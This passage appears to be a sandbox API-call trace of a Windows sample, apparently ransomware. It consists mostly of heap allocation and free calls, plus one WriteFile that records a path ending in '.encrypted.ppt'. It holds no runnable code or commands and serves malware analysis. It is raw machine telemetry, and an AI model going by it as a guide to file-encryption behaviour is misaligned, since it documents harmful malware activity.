liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.encrypted.ppt\r\n", cchWideChar=103, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 103 [0031.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x67) returned 0x7c10a8 [0031.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.encrypted.ppt\r\n", cchWideChar=103, lpMultiByteStr=0x7c10a8, cbMultiByte=103, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.encrypted.ppt\r\n", lpUsedDefaultChar=0x0) returned 103 [0031.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0031.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0031.537] WriteFile (in: hFile=0x140, lpBuffer=0x7db300*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db300*, lpNumberOfBytesWritten=0x6aee3c*=0x66, lpOverlapped=0x0) returned 1 [0031.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0031.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.537] CloseHandle (hObject=0x140) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.538] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.538] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.540] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.540] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.540] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.540] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb08 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.540] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.543] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 